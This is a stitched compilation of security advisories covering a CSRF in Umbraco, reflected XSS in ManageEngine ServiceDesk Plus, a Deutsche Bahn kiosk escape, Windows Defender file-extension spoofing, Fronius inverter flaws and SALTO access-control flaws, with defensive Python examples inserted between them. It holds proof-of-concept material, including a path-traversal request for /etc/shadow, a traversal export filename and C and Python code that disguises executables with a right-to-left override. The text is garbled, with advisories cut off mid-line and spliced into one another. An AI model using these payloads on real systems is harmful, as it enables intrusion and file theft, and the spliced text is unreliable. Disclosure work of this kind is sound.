SEC Consult SA-20200123-0 :: Cross-Site Request Forgery (CSRF) in Umbraco CMS
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >
=======================================================================
              title: Cross-Site Request Forgery (CSRF)
            product: Umbraco CMS
 vulnerable version: version 8.2.2
      fixed version: version 8.5
         CVE number: CVE-2020-7210
             impact: medium
           homepage: https://umbraco.com/
              found: October 2019
                 by: A. Melnikova (Office Moscow)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Umbraco 8 is the latest version of Umbraco CMS. It's the fastest and best
version of Umbraco and a big step forward in regard to making your work with
Umbraco simpler; simpler to extend, simpler to edit, simpler to publish -
simpler to use, simpler to enjoy."

Source: https://umbraco.com/products/umbraco-cms/umbraco-8/


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to immediately
upgrade to the latest version available.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF)
An attacker can use cross-site request forgery to perform arbitrary web
requests with the identity of the victim, without being noticed by the victim.
This attack always requires some sort of user interaction: usually the victim
needs to click on an attacker-prepared link or visit a page under the control
of the attacker.

Because the user-management endpoints of the backoffice do not verify that a
state-changing request originated from the backoffice itself, an attacker is
able to enable/disable or delete accounts. This may lead to a DoS of user
accounts.


Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF)
In a live attack scenario, the following HTML document would be hosted on a
malicious website controlled by the attacker.

Example 1: HTML-code for disabling a user:

  history.pushState('', '', '/')

Request:
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1
Host: [...]
Cookie:

Response:
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 112
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie:
Date: Wed, 06 Nov 2019 10:57:45 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"}


Example 2: HTML-code for enabling a user:

  history.pushState('', '', '/')

Request:
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1
Host: [...]
Cookie:

Response:
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 110
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Wed, 06 Nov 2019 10:58:12 GMT
Connection: close

)]}',
{"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"}


Example 3: HTML-code for deleting a user:

  history.pushState('', '', '/')

Request:
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1
Host: [...]
Cookie:

Response:
HTTP/1.1 200 OK
Cache-Control: no-store, must-revalidate, no-cache, max-age=0
Pragma: no-cache
Content-Length: 114
Content-Type: application/json; charset=utf-8
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Set-Cookie:
Date: Wed, 06 Nov 2019 10:58:36 GMT
Connection: close

)]}',
{"notifications":[{"header":"User was deleted","message":"","type":3}],"message":"User was deleted"}


As soon as an authenticated victim (admin) visits a website with this HTML code
embedded, the payload gets executed in the context of the victim's session.
Although the responses to these requests are not delivered to the attacker, in
many cases it is sufficient to be able to compromise the integrity of the
victim's information stored on the site, or to perform certain, possibly
compromising, requests to other sites.
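The two checks whose absence makes the backoffice requests above forgeable, shown as an added example in Python. This is illustrative code, not Umbraco's code and not the fix shipped in 8.5: the origin constant, the header and cookie names, the session store and the sample requests are all assumptions constructed for this example.

```python
"""Server-side CSRF check for a state-changing backoffice endpoint.

Added example, not Umbraco code. A cross-site page can make the victim's
browser send the session cookie, but it cannot control the Origin/Referer
headers the browser sets and cannot read a token bound to the victim's
session. Rejecting requests that fail either check stops the attack above.
"""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://cms.example.com"          # assumed deployment origin
TOKEN_HEADER = "X-XSRF-TOKEN"                    # assumed header name
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def issue_token(session):
    """Bind a fresh anti-forgery token to the server-side session."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _origin_of(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_check(method, headers, session):
    """Return (ok, reason). Safe methods pass; every other method needs
    same-origin evidence and a token that matches the session."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"

    # 1) Source check: Origin (or Referer as fallback) must equal the site.
    source = headers.get("Origin") or headers.get("Referer")
    if source is None:
        return False, "no Origin/Referer header"
    if _origin_of(source) != SITE_ORIGIN.lower():
        return False, f"cross-site request from {_origin_of(source)}"

    # 2) Token check: the attacker's page cannot read the session-bound
    #    token, so it cannot put it into a request header.
    expected = session.get("csrf_token")
    presented = headers.get(TOKEN_HEADER)
    if not expected or not presented:
        return False, "missing anti-forgery token"
    if not hmac.compare_digest(expected, presented):
        return False, "anti-forgery token mismatch"
    return True, "ok"


# Constructed requests mimicking the advisory's scenario (not captured traffic).
victim_session = {}
token = issue_token(victim_session)

# Forged request from the attacker's page: the browser attaches the victim's
# cookie automatically, but Origin names the attacker and no token is present.
forged_headers = {"Origin": "https://attacker.example", "Cookie": "session=..."}

# Legitimate request made by the backoffice front end itself.
legit_headers = {"Origin": SITE_ORIGIN, TOKEN_HEADER: token, "Cookie": "session=..."}

if __name__ == "__main__":
    print(csrf_check("POST", forged_headers, victim_session))
    print(csrf_check("POST", legit_headers, victim_session))
```

Note that the Origin check alone already defeats the PoC above, but it should not be the only defence: some clients omit both Origin and Referer, which is why the code treats a missing header as a rejection and additionally requires the token.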
Vulnerable / tested versions:
-----------------------------
The following version was tested and found to be vulnerable:
* version 8.2.2


Vendor contact timeline:
------------------------
2019-11-13: Contacting vendor through secur...@umbraco.com.
2019-11-13: Requesting encryption keys.
SEC Consult SA-20200122-0 :: Reflected XSS in ZOHO ManageEngine ServiceDeskPlus
SEC Consult Vulnerability Lab Security Advisory < 20200122-0 >
=======================================================================
              title: Reflected XSS
            product: ZOHO ManageEngine ServiceDeskPlus
 vulnerable version: <= 11.0 Build 11007
      fixed version: 11.0 Build 11010
         CVE number: CVE-2020-6843
             impact: medium
           homepage: https://www.manageengine.com/products/service-desk/
              found: 2019-12-01
                 by: Johannes Kruchem (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ServiceDesk Plus is a game changer in turning IT teams from daily
fire-fighting to delivering awesome customer service. It provides great
visibility and central control in dealing with IT issues to ensure that
businesses suffer no downtime. For 10 years and running, it has been
delivering smiles to millions of IT folks, end users, and stakeholders alike."

Source: https://www.manageengine.com/products/service-desk/


Business recommendation:
------------------------
The vendor published a patch for ServiceDesk Plus with service pack 11010. It
is recommended to install the patch with the included patcher.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected by further security issues.


Vulnerability overview/description:
-----------------------------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
The "key" parameter of the "geti18nkey" module reflects user input into the
response without filtering as soon as its value is modified. The corresponding
request is sent frequently in the background once a pre-configured network
scan has been started.


Proof of concept:
-----------------
1) Reflected Cross-Site Scripting (CVE-2020-6843)
To reproduce the issue visit this URL authenticated as administrator:
http://$IP:8080/CustomReportHandler.do?module=geti18nkey=

How the parameter was found:
1) Authenticate as administrator and add an IP range in Admin -> Networkscan.
2) Click the "play" button next to the created IP range to start the scan.
3) To check the status of a started network scan, frequent requests like
   "http://$IP:8080/CustomReportHandler.do?module=geti18nkey=sdp.admin.network.listview.discoverystatus.scanned=<%someUUID%>"
   are sent to the server.
4) The value of the "key" parameter will be reflected if you change a single
   character. The "sdpcsrfparam" isn't needed in order to trigger the XSS.
5) XSS can thus be exploited by calling
   "http://$IP:8080/CustomReportHandler.do?module=geti18nkey="


Vulnerable / tested versions:
-----------------------------
The following versions have been tested, which were the latest versions
available at the time of the test:
- 10.5
- 11.0 Build 11007


Vendor contact timeline:
------------------------
2019-12-05: Contacting vendor through ManageEngine Security Response Center
            (MESRC); uploaded security advisory to bugbounty.zoho.com.
2019-12-09: Vendor promised to fix the vulnerability.
2020-01-08: Reported issue has been fixed in service pack 11010.
2020-01-22: Public release of security advisory.


Solution:
---------
The vendor provides an updated version which should be installed immediately.
https://www.manageengine.com/products/service-desk/download.html

The vendor also provided a link to their readme about the new release:
https://www.manageengine.com/products/service-desk/readme.html#11010


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendations about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested in working with the experts of SEC Consult?
Send us your application.
https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices.
https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
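The reflection behaviour behind the ServiceDesk Plus finding above (an i18n lookup that echoes an unknown key back into the page) and the "change a single character" test from step 4, as an added Python example. This is not ServiceDesk Plus code: the key table, the markup, the handler names and the probe are assumptions constructed for this example; the fixed variant shows the output encoding that removes the reflection.

```python
"""Reflection probe for an i18n-key lookup endpoint.

Added example; this is not ServiceDesk Plus code. It models the behaviour
described above, a lookup that echoes an unknown key straight back into the
HTML response, once without and once with output encoding, and a probe that
tells the two apart by submitting a canary containing HTML metacharacters
and checking whether it comes back untouched.
"""
import html
import secrets

# Constructed stand-in for the server's i18n key table.
I18N = {
    "sdp.admin.network.listview.discoverystatus.scanned": "Scanned",
}


def geti18nkey_vulnerable(key):
    """Unknown keys are reflected verbatim into an HTML fragment."""
    return I18N.get(key, f"<span class='i18n-missing'>{key}</span>")


def geti18nkey_fixed(key):
    """Same lookup, but anything reflected is HTML-encoded first, so a
    value like '"><script>' can no longer break out of the element."""
    return I18N.get(key, f"<span class='i18n-missing'>{html.escape(key, quote=True)}</span>")


def reflects_unencoded(handler):
    """Change the key by a few characters that matter in HTML and see whether
    they survive unencoded. The random marker ties the echo to this probe."""
    marker = secrets.token_hex(4)
    canary = f'"><{marker}>'
    return canary in handler(canary)


def probe_report():
    return {
        "vulnerable": reflects_unencoded(geti18nkey_vulnerable),
        "fixed": reflects_unencoded(geti18nkey_fixed),
    }


if __name__ == "__main__":
    print(probe_report())
```

The probe deliberately uses a fresh marker per request so that a positive result can be traced to the request that produced it in server logs, and it tests for the raw metacharacters rather than for a working script, which is what a scanner needs before it tries an actual payload.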
Deutsche Bahn Ticket Vending Machine Windows XP - Local Kiosk Privilege Escalation Vulnerability
   ine (editor / debugger / cmd / ps - exp. ransomware/malware)
2. Local manipulation to assist skimming devices (transmit, prepare)
3. Phishing of local credentials from the screen via the system (db browser application)
4. Intercept or manipulate access to card information (local file system - sniff/extract)
5. Crash or freeze the computer system (exp. kill of process / loop script)
6. Scare or joke activities (exp. html / js to front screens with web browser or by a new window process)

Reference(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG


Solution - Fix & Patch:
=======================
There are several system-hardening problems that can now be resolved:
1. It should not be possible for users with system user rights to use the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser, messages & Co.)
4. Check that all other tasks are always running in the background or are being moved there permanently
5. The Deutsche Bahn vending machine application and user interface should be shut down in the event of persistent errors in the foreground
6. The activities of the testing were logged but did not trigger any alert for defense purposes

Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png


Security Risk:
==============
The security risk of the local ticket vending machine system vulnerability is
estimated as high. The escalation bug can be easily exploited by local
interaction with the touch display to access the file system.


Credits & Authors:
==================
Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of
business profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some states do not allow
the exclusion or limitation of liability for consequential or incidental
damages, so the foregoing limitation may not apply. We do not approve or
encourage anybody to break any licenses, policies, deface websites, hack into
databases or trade with stolen data.

Domains:    www.vulnerability-lab.com   www.vuln-lab.com   www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com   paste.vulnerability-db.com   infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab   facebook.com/VulnerabilityLab   youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php   vulnerability-lab.com/register.php   vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website are
trademarks of the vulnerability-lab team & the specific authors or managers.
To record, list, modify, use or edit our material contact (admin@ or
research@) to ask for permission.

                 Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
SEC Consult SA-20191211-0 :: File Extension Spoofing in Windows Defender Antivirus
SEC Consult Vulnerability Lab Security Advisory < 20191211-0 >
=======================================================================
              title: File Extension Spoofing
            product: Windows Defender Antivirus
 vulnerable version: 4.18.1908.7-0
      fixed version: Virus Definition Update of 2019/09/30
         CVE number: -
             impact: High
           homepage: https://www.microsoft.com/de-at/windows/comprehensive-security
              found: 2019-09-25
                 by: David Haintz (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Keep your PC safe with trusted antivirus protection built-in to Windows 10.
Windows Defender Antivirus delivers comprehensive, ongoing and real-time
protection against software threats like viruses, malware and spyware across
email, apps, the cloud and the web."

Source: https://www.microsoft.com/de-at/windows/comprehensive-security


Business recommendation:
------------------------
Update to the latest version of the Windows Defender Antivirus definitions.


Vulnerability overview/description:
-----------------------------------
The vulnerability is based on the well-known file extension spoofing technique
that uses the Unicode right-to-left override character (RLO, U+202E) to display
a spoofed file extension. Everything that follows the RLO character is rendered
in right-to-left order, i.e. mirrored. Let [RTL] stand for that character: an
attacker can use it to fool a user into believing that a file has a different
extension. For example, an attacker may name an executable file (.exe)
'spoofed-[RTL]gpj.exe', which is displayed as 'spoofed-exe.jpg' on a system
with left-to-right text direction. The important point is that the extension
the victim is supposed to see has to be written in reverse order in the real
file name, since it will be shown right-to-left. Combined with the right file
icon, an attacker can imitate an arbitrary file extension. The same goes for
other extensions too, like 'xlsx' for a Microsoft Excel sheet.

During testing, 'xlsx' was accidentally typed in the wrong order ('xslx'
instead of 'xlsx', since the characters have to be reversed) and Windows
Defender Antivirus removed the test file while we tried to execute it. As a
result, two files were created, containing the exact same executable but with
different fake extensions:
1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx')
2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx')

The second one was deleted, while the first one could be executed without any
problem. Therefore, other extensions related to Microsoft Office were tested
as well, but it seems only the 'xlsx' extension has a detection for it.

While the security issue of spoofing the file extension by using the RLO
character (on right-to-left systems the same works with the left-to-right
override, U+202D) is widely known, it seems to be unknown that Microsoft has
already started to add detection mechanisms for this issue. But since it is
not implemented for all extensions, and the one detection that exists matches
the extension in the wrong order (the raw string 'xlsx' after the override,
which is displayed as 'xslx'), this feature is mostly unknown.


Proof of concept:
-----------------
For the proof of concept a file has to be renamed using the Unicode character
U+202E ('\u202E' in C), the RIGHT-TO-LEFT OVERRIDE. The sample code is written
in C/C++ and uses the Unicode API of Windows. A Python PoC has been made as
well.

C/C++:

```c
#include <windows.h>

int main(int argc, char** argv)
{
    wchar_t opath[] = L"test.exe";
    wchar_t npath_ok[] = L"spoofed-\u202Exslx.exe";    // String for filename 'spoofed-exe.xlsx'
    wchar_t npath_wrong[] = L"spoofed-\u202Exlsx.exe"; // String for filename 'spoofed-exe.xslx'

    // Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
    CopyFileW(opath, npath_ok, FALSE);
    // Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
    CopyFileW(opath, npath_wrong, FALSE);
    return 0;
}
```

Python:

```python
from shutil import copyfile

opath = "test.exe"
npath_ok = "spoofed-\u202Exslx.exe"     # String for filename 'spoofed-exe.xlsx'
npath_wrong = "spoofed-\u202Exlsx.exe"  # String for filename 'spoofed-exe.xslx'

# Copy 'test.exe' to file shown as 'spoofed-exe.xlsx'
copyfile(opath, npath_ok)
# Copy 'test.exe' to file shown as 'spoofed-exe.xslx'
copyfile(opath, npath_wrong)
```

There will be two new files after the execution (as long as 'test.exe' exists)
and the file shown as 'spoofed-exe.xslx' will be deleted while trying to
execute it (or earlier), as shown in figure 1.

[ win-defender-ext-spoofing1.png ]
Figure 1: File gets deleted by Windows Defender Antivirus.

But the file shown as 'spoofed-exe.xlsx' will be executed without any problem.

[ win-defender-ext-spo
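The check a mail gateway, upload handler or EDR rule would want for the technique above, as an added Python example. It is neither the advisory's PoC nor Windows Defender's detection logic: it flags any Unicode directional control in a file name, reports the extension the operating system actually uses, and approximates what a left-to-right desktop displays after an RLO, which is exactly the mismatch the advisory exploits. The sample file names follow the advisory's pattern and are constructed here.

```python
"""Detect bidirectional-override tricks in file names.

Added example; this is neither the advisory's PoC nor Windows Defender logic.
Given a raw file name it reports the Unicode directional controls it contains,
the extension the operating system will actually use (the last suffix of the
raw string) and an approximation of what a left-to-right desktop displays when
a right-to-left override (U+202E) mirrors everything after it.
"""
import unicodedata

# Explicit and isolate directional controls that can be abused in file names.
BIDI_CONTROLS = frozenset(
    "\u200e\u200f"                    # LRM, RLM
    "\u202a\u202b\u202c\u202d\u202e"  # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"        # LRI, RLI, FSI, PDI
)
RLO = "\u202e"


def strip_controls(text):
    return "".join(ch for ch in text if ch not in BIDI_CONTROLS)


def displayed_name(name):
    """Approximate rendering on a left-to-right desktop: the text after the
    first RLO is shown mirrored. Good enough for ASCII names; this is not a
    full implementation of the Unicode bidirectional algorithm."""
    prefix, rlo, rest = name.partition(RLO)
    if not rlo:
        return strip_controls(name)
    return strip_controls(prefix) + strip_controls(rest)[::-1]


def _extension(name):
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def inspect_filename(name):
    """Summarise what the OS sees versus what the user sees."""
    controls = [f"U+{ord(ch):04X} {unicodedata.name(ch)}" for ch in name if ch in BIDI_CONTROLS]
    shown = displayed_name(name)
    real_ext, shown_ext = _extension(name), _extension(shown)
    return {
        "raw": name,
        "controls": controls,
        "displayed": shown,
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        # Flag any directional control, and any mismatch between the two views.
        "suspicious": bool(controls) or real_ext != shown_ext,
    }


if __name__ == "__main__":
    # Constructed samples: the two names from the advisory and a benign one.
    for sample in ("spoofed-\u202exslx.exe", "spoofed-\u202exlsx.exe", "report.xlsx"):
        print(inspect_filename(sample))
```

Matching on the raw string (as the single existing detection described above apparently does) only catches one spelling; comparing the real extension with the displayed one catches every spelling, and flagging the control characters themselves catches the trick regardless of extension, since there is no legitimate reason for an RLO in a file name on a left-to-right system.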
SEC Consult SA-20191203-0 :: Multiple vulnerabilities in Fronius Solar Inverter Series
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Fronius Solar Inverter Series
 vulnerable version: SW Version <3.14.1 (HM 1.12.1)
      fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution section below
         CVE number: CVE-2019-19228, CVE-2019-19229
             impact: High
           homepage: https://www.fronius.com
              found: 2018-10-31
                 by: T. Weber (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"A passion for new technologies, intensive research and revolutionary
solutions have been shaping the Fronius brand since 1945. As the technology
leader, we find, develop and implement innovative methods to monitor and
control energy for welding technology, photovoltaics and battery charging. We
forge new paths, try something difficult and succeed where others have failed
in achieving what seems to be impossible. [...]"

Source: http://www.fronius.com/en/about-fronius/company-values


Business recommendation:
------------------------
The vendor automatically performed a fleet update of the solar inverters in the
field in order to patch them. Nevertheless, as not all devices could be reached
through such an update, all remaining users are advised to install the patches
provided by the vendor immediately.


Vulnerability overview/description:
-----------------------------------
1) Unencrypted Communication
The whole communication is handled over HTTP. There is no possibility to
activate an HTTPS web service. This vulnerability cannot be fixed by the vendor
in the current solar inverter generation, see the workaround section below.

2) Authenticated Path Traversal (CVE-2019-19229)
A path traversal attack for authenticated users is possible. This allows
getting access to the operating system of the device and accessing information
like network configurations and connections to other hosts, or potentially
other sensitive information.

This vulnerability has been fixed in March 2019 in version 3.12.5 (HM 1.10.5).

The web server runs with "nobody" privileges, but nearly all files on the file
system are world-readable and can be extracted. This can be seen as another
vulnerability, but according to the vendor this cannot be fixed in the current
solar inverter generation.

3) Backdoor Account (CVE-2019-19228)
The web interface has a backdoor user account with the username "today". This
user account has all permissions of all other users ("service", "admin" and
"user") together. As its name suggests, the password for the user "today"
changes every day and seems to differ between devices with the same firmware.
This means that some device-specific strings (e.g. the public device ID) are
mixed up every day to generate a new password. This account is used by Fronius
support in order to access the device upon request from the user.

The fix for this issue has been split into two parts. The "password reset"
part has been fixed in version 3.14.1 (HM 1.12.1); the second part, providing
the support account, needs an architectural rework which will be fixed in a
future version (planned for 3.15.1 (HM 1.15.1)).

The passwords for all users of the web interface are stored in plain text.
This can be seen as another vulnerability and it has been fixed in version
3.14.1 (HM 1.12.1).

4) Outdated and Vulnerable Software Components
Outdated and vulnerable software components were found on the device during a
quick examination. Not all of the outdated components can be fixed by the
vendor in the current solar inverter generation, see the workaround section
below.


Proof of concept:
-----------------
1) Unencrypted Communication
By using an interceptor proxy this vulnerability can be verified in a simple
way.

2) Authenticated Path Traversal (CVE-2019-19229)
By sending the following request to the following endpoint, a path traversal
vulnerability can be triggered:
http:///admincgi-bin/service.fcgi

Request to read the "/etc/shadow" password file:
┌──────────────────────────────────────────────────────────────────────────
|GET /admincgi-bin/service.fcgi?action=download=../../../../../etc/shadow
└──────────────────────────────────────────────────────────────────────────

As response, the file is returned without line breaks. In this example the
line breaks are added for better readability:
┌──────────────────────────────────────────────────────────────────────────
|HTTP/1.1 200 OK
|Content-Type: appli
SEC Consult SA-20191202-0 :: Multiple Critical Vulnerabilities in SALTO ProAccess SPACE
SEC Consult Vulnerability Lab Security Advisory < 20191202-0 >
=======================================================================
              title: Multiple Critical Vulnerabilities
            product: SALTO ProAccess SPACE
 vulnerable version: <= v5.5
      fixed version: >= v5.6
         CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459, CVE-2019-19460
             impact: critical
           homepage: https://www.saltosystems.com/en/
              found: 2019-05-22
                 by: Werner Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Europe | Asia | North America

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"SALTO ProAccess SPACE Software is a powerful access control management tool
that enables you to program access time zones for each user, manage different
calendars and obtain audit trails from each door to see who has passed through
it. The software includes special functions such as automatic door status
changes, anti-passback and relay management. Thanks to its advanced software
features, SALTO ProAccess SPACE is also one of the most user-friendly and
powerful software products for the access control management of stand-alone
wireless devices, and IP online devices in one converged complete access
control platform for the user, keys and doors management."

Source: http://proaccess-space.saltosystems.com/features/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult recommends performing a thorough security review conducted by
security professionals to identify and resolve all security issues.


Vulnerability overview/description:
-----------------------------------
1. Path Traversal (CVE-2019-19458)
Path traversal vulnerabilities allow attackers access to files and directories
outside the application root through relative file paths in the user input.
During a quick security check, multiple locations in the web application were
identified which allow an attacker to traverse outside of the application
root. The vulnerabilities were identified in the "Data Export" as well as the
"Database Export" functionality.

Those vulnerabilities can for example be used to dump the whole database into
the web root by traversing outside of the application root.

2. Arbitrary File Write (CVE-2019-19459)
By further exploiting the path traversal vulnerability inside of the "Data
Export" feature, an attacker is able to traverse into arbitrary paths and
write arbitrary files with arbitrary contents. Examples are files written into
the web root, or .bat files placed into the autostart folder. This allows an
attacker to execute arbitrary commands on the server.

3. Stored Cross-Site Scripting (CVE-2019-19457)
By adding devices to the SALTO network with a JavaScript payload inside of
certain parameters, an attacker is able to permanently embed arbitrary
JavaScript payloads inside of the web application.

4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460)
The webserver of SALTO ProAccess SPACE runs as a Windows service with local
SYSTEM permissions per default. This violates the principle of least
privilege. An attacker who is able to exploit the path traversal or the
arbitrary file write vulnerability is able to write to every single path on
the file system, because the webserver is running with the highest privileges
available.

5. Authorization Issues
Multiple API calls were identified in the SALTO ProAccess SPACE web
application that should only be callable by highly privileged users.
Nevertheless, by directly calling the API with the OAuth token of a low
privileged user, it was possible to call some API endpoints that shouldn't be
available to that user.

6. Cleartext transmission of sensitive data
The SALTO ProAccess SPACE web application allows its users to create so-called
event streams. Those streams can be used to log events centrally. The stream
is transmitted via TCP/UDP in JSON or CSV format. The stream is transmitted in
cleartext and leaks sensitive data such as who opened which door and when,
including card IDs etc.


Proof of concept:
-----------------
1. Path Traversal (CVE-2019-19458)
The "Data Export" as well as the "Database Export" features in SALTO ProAccess
SPACE allow users to specify a filename for the different exports. By using
special characters inside of the filename, an attacker is able to traverse
outside of the designated export path and place the exports in arbitrary
locations. For example, the following filename can be used in the database
export to store the database backup inside of the webroot:
..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.
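The Fronius download traversal (CVE-2019-19229, a read) and the SALTO export-filename traversal (CVE-2019-19458, a write) are the same missing check seen from two sides: a user-controlled name is joined onto a base directory without verifying that the resolved path still lies inside it. The containment check below is an added Python example serving both advisories; it is not Fronius or SALTO code. The two payloads are the ones quoted above, the base directories are assumptions chosen for illustration, and the function handles both '/' and '\' separators so the same logic applies to a Linux device and a Windows server.

```python
"""Containment check for user-supplied file names and paths.

Added example; this is not Fronius or SALTO code. The function normalises
both separators, resolves '..' components and rejects anything that escapes
the base directory, including absolute paths, rooted paths and drive letters.
"""
import ntpath
import posixpath


def contained_path(base_dir, user_value, windows=False):
    """Return the normalised path of user_value below base_dir, or None when
    the value would escape base_dir. base_dir must be absolute."""
    p = ntpath if windows else posixpath
    sep = p.sep
    # Web input may use either separator; fold it to the target platform's.
    value = user_value.replace("/" if windows else "\\", sep)
    # Absolute paths, rooted paths and drive-letter prefixes are never allowed.
    if p.isabs(value) or value.startswith(sep) or p.splitdrive(value)[0]:
        return None
    base = p.normpath(base_dir)
    candidate = p.normpath(p.join(base, value))
    # After normalisation the result must be base itself or lie below it.
    if candidate == base or candidate.startswith(base + sep):
        return candidate
    return None


# Payloads quoted in the advisories above; the base directories are assumed.
FRONIUS_BASE = "/var/www/download"                       # assumed
FRONIUS_PAYLOAD = "../../../../../etc/shadow"
SALTO_BASE = r"C:\SALTO\ProAccess Space\exports"         # assumed
SALTO_PAYLOAD = r"..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup"


def demo():
    """Traversal payloads are refused, ordinary names are accepted."""
    return {
        "fronius_traversal": contained_path(FRONIUS_BASE, FRONIUS_PAYLOAD),
        "fronius_ok": contained_path(FRONIUS_BASE, "logs/2019-10-31.log"),
        "salto_traversal": contained_path(SALTO_BASE, SALTO_PAYLOAD, windows=True),
        "salto_ok": contained_path(SALTO_BASE, "backup.bak", windows=True),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {'rejected' if result is None else result}")
```

The prefix comparison uses base plus a separator, not base alone, so that a sibling directory whose name merely starts with the base name (for example "exports2" next to "exports") is also rejected. On the SALTO side the check would have to run before the export is written; on the Fronius side it would have to run before the file is opened, and in both cases it is no substitute for running the service with least privilege, which the SALTO advisory raises as CVE-2019-19460.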
Re: SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
Hi,

we received incorrect version information during the coordination phase, thus
